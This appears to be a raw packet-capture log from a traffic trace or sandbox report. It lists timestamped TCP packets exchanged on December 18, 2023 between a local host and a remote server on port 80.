                                        Dec 18, 2023 14:31:21.702769995 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.702814102 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.702876091 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.702893972 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.702935934 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.702960014 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.702990055 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703039885 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703048944 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703072071 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703115940 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703171968 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703186989 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703207970 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703232050 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703296900 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703335047 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703342915 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703370094 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703413963 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703418970 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703475952 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703490019 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703521013 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703555107 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703569889 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703600883 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703649998 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703670979 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703712940 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703715086 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703744888 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703785896 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703797102 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703845024 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703887939 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703886986 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.703943014 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703963041 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.703995943 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704015970 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704046965 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704061031 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704092026 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704117060 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704150915 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704164028 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704175949 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704206944 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704251051 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704263926 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704308033 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704354048 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704405069 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704451084 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704463005 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704494953 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704535007 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704546928 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704590082 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704627991 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704641104 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704689026 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704751968 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704771996 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704787970 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704829931 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704833984 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704864979 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704890013 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704915047 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.704962969 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.704974890 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705003977 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.705101013 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705157995 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.705234051 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705292940 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705312014 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705337048 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:21.705423117 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705435038 CET804973045.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:21.705480099 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:22.855242968 CET4973080192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:25.891225100 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.129870892 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.129982948 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.130563021 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.369484901 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.369561911 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.369605064 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.369663954 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.369676113 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.369798899 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.608253956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608371019 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608422995 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.608429909 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608529091 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608575106 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.608607054 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608694077 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608738899 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.608757973 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608824015 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608850956 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.608875036 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.846940041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.846987963 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847038984 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.847050905 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847117901 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847129107 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847157955 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.847187996 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847232103 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847274065 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.847280979 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847424030 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847467899 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.847507954 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847528934 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847578049 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.847700119 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847800016 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847827911 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.847840071 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.848032951 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.848112106 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.848124981 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.848155975 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:26.848366022 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.848376036 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:26.848414898 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.085531950 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085589886 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085650921 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085659027 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.085726023 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085783005 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.085813046 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085906029 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.085953951 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.085972071 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086029053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086054087 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086076021 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086129904 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086184978 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086229086 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086285114 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086371899 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086419106 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086430073 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086452961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086498976 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086545944 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086644888 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086659908 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086690903 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086776972 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086858034 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086904049 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.086935997 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.086987019 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087003946 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087033033 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087061882 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087162971 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087208033 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087220907 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087270021 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087280035 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087332010 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087346077 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087413073 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087455034 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087501049 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087619066 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087665081 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087730885 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087826967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087863922 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.087874889 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.087954044 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.088022947 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.088071108 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.088078022 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.324528933 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.324618101 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.324693918 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.324695110 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.324791908 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.324834108 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.324935913 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325017929 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325062990 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.325093985 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325206041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325217009 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325253963 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.325334072 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325407028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325453997 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.325506926 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325598955 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325633049 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325643063 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.325741053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325825930 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325874090 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.325894117 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325959921 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.325994015 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326047897 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326137066 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326179028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326180935 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326246023 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326256990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326292038 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326378107 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326435089 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326478004 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326486111 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326555967 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326598883 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326612949 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326653957 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326698065 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326710939 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326756954 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326767921 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326806068 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326850891 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326905966 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.326951027 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.326961994 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327001095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327027082 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327039003 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327099085 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327156067 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327198982 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327219009 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327286959 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327332020 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327373981 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327456951 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327498913 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327512026 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327549934 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327559948 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327598095 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327636957 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327743053 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327805042 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327805042 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327878952 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.327925920 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.327960968 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328052044 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328095913 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328136921 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328200102 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328243971 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328246117 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328306913 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328351974 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328366041 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328414917 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328459024 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328464031 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328525066 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328571081 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328600883 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328613997 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328658104 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328689098 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328780890 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328826904 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.328847885 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328922987 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328933001 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.328970909 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.329001904 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.329067945 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.329113007 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.329128981 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.329191923 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.329202890 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.329243898 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563092947 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563150883 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563195944 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563225985 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563257933 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563268900 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563296080 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563328028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563410997 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563446999 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563448906 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563515902 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563527107 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563554049 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563606024 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563653946 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563692093 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563716888 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563779116 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563805103 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563815117 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.563924074 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.563999891 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564043045 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564045906 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564106941 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564150095 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564155102 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564174891 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564213991 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564255953 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564376116 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564414024 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564440966 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564563990 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564615965 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564662933 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564682007 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564732075 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564768076 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.564794064 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564845085 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564887047 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.564889908 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565093994 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565104961 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565134048 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565154076 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565212011 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565251112 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565264940 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565324068 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565367937 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565368891 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565431118 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565478086 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565499067 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565561056 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565572977 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565619946 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565639973 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565716028 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565776110 CET4973780192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:27.565793037 CET804973745.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:27.565861940 CET804973745.137.22.163192.168.2.4
